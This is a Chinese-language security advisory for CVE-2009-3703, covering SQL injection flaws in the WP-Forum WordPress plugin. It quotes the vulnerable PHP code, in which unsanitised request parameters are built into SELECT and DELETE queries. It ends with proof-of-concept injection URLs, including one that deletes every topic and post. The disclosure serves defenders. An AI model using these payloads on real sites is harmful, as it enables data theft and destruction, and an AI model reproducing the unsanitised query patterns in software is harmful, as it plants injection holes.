RootSSV:15131WordPress WP-Forum插件多个SQL注入漏洞
0.001 Low
EPSS
Percentile
28.7%
BUGTRAQ ID: 37357
CVE ID: CVE-2009-3703
WP-Forum是一款基于PHP的WordPress插件。
WP-Forum的wpf.class.php页面没有正确地过滤用户所提交的forum、topic和search_max参数,以及在 editpost或viewtopic操作中所提交的id参数,远程攻击者可以通过提交恶意参数请求执行SQL注入攻击。以下是有漏洞的代码段:
wpf.class文件
1836 $option_max_days = $_POST[‘search_max’]; // <- this line is not being sanitized
1837 $option_forums = $_POST[‘forum’];
1838 if(!$option_max_days)
1839 $option_max_days = 9999;
1840 $op .= " AND $this->t_posts.date > SUBDATE(CURDATE(),
INTERVAL $option_max_days DAY) ";
1841
…
1850 foreach((array)$option_forums as $f)
1851 $a .= $f.","; // <- <- this lines is not being sanitized
1852
1853 $a = substr($a, 0, strlen($a)-1 );
1854 if(!$a)
1855 $w = "";
1856 else
1857 $w = "IN($a)";
1858
1859 $sql = "SELECT $this->t_threads.parent_id as pt,
$this->t_posts.id, text, $this->t_posts.subject,
$this->t_posts.parent_id, $this->t_posts.date, MATCH ($what) AGAINST
(‘$search_string’) AS score
1860 FROM $this->t_posts inner join $this->t_threads on
$this->t_posts.parent_id = $this->t_threads.id
1861 WHERE $this->t_threads.parent_id $w
1862 AND MATCH (text) AGAINST (‘$search_string’) $op";
在wpf-post.php文件中:
57 $id = $_GET[‘id’]; // <- $_GET[‘id’] is directly assigned
58 $thread = $this->check_parms($_GET[‘t’]);
59
60 $out .= $this->header();
61
62 $post = $wpdb->get_row("SELECT * FROM $wpforum->t_posts WHERE
id = $id"); // <- id is used without clean up
其他示例:
1490 function remove_post(){
1491 global $user_level, $user_ID, $wpdb;
1492 $id = $_GET[‘id’]; // <- $_GET[‘id’] is directly assigned
1493 $author = $wpdb->get_var("SELECT author_id from
$this->t_posts where id = $id"); // id is used without clean up
…
1503 if($del == "ok"){
1504 $wpdb->query("DELETE FROM $this->t_posts WHERE id
= $id"); <- // id is used without clean up
1505 $this->o .= "<div class=‘updated’>".("Post
deleted", "wpforum")."</div>";
1506 }
1507 else
1508 wp_die(("Cheating, are we?", "wpforum"));
1509
1510 }
此外由于没有正确的过滤$_GET[‘topic’],还可以清除$this->t_posts和$this->t_threads表格中的所有记录:
1479 function remove_topic(){
1480 global $user_level, $user_ID, $wpdb;
1481 $topic = $_GET[‘topic’];
1482 if($this->is_moderator($user_ID, $this->current_forum)){
1483 $wpdb->query("DELETE FROM $this->t_posts WHERE
parent_id = $topic");
1484 $wpdb->query("DELETE FROM $this->t_threads WHERE
id = $topic");
1485 }
1486 else
1487 wp_die(__("Cheating, are we?", "wpforum"));
1488
1489 }
Fredrik Fahlstad WP-Forum <= 2.3
厂商补丁:
Fredrik Fahlstad
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.example.com/blog/?page_id=3&amp;wpforumaction=editpost&amp;id=1%20and%201=0&amp;t=.0
http://www.example.com/blog/?page_id=3&amp;wpforumaction=editpost&amp;id=1%20and%201=1&amp;t=.0
http://www.example.com/blog/?page_id=3&amp;wpforumaction=viewforum&amp;f=2.0&amp;delete_topic&amp;topic=3%20and%201=0
http://www.example.com/blog/?page_id=3&amp;wpforumaction=viewforum&amp;f=2.0&amp;delete_topic&amp;topic=3%20and%201=1
http://www.example.com/blog/?page_id=3&amp;wpforumaction=viewtopic&amp;t=1.0&amp;sticky&amp;id=1%20and%201=0
http://www.example.com/blog/?page_id=3&amp;wpforumaction=viewtopic&amp;t=1.0&amp;sticky&amp;id=1%20and%201=1
http://www.example.com/blog/?page_id=3&amp;wpforumaction=viewforum&amp;f=1.0&amp;delete_topic&amp;topic=5%20or%201=1
Related
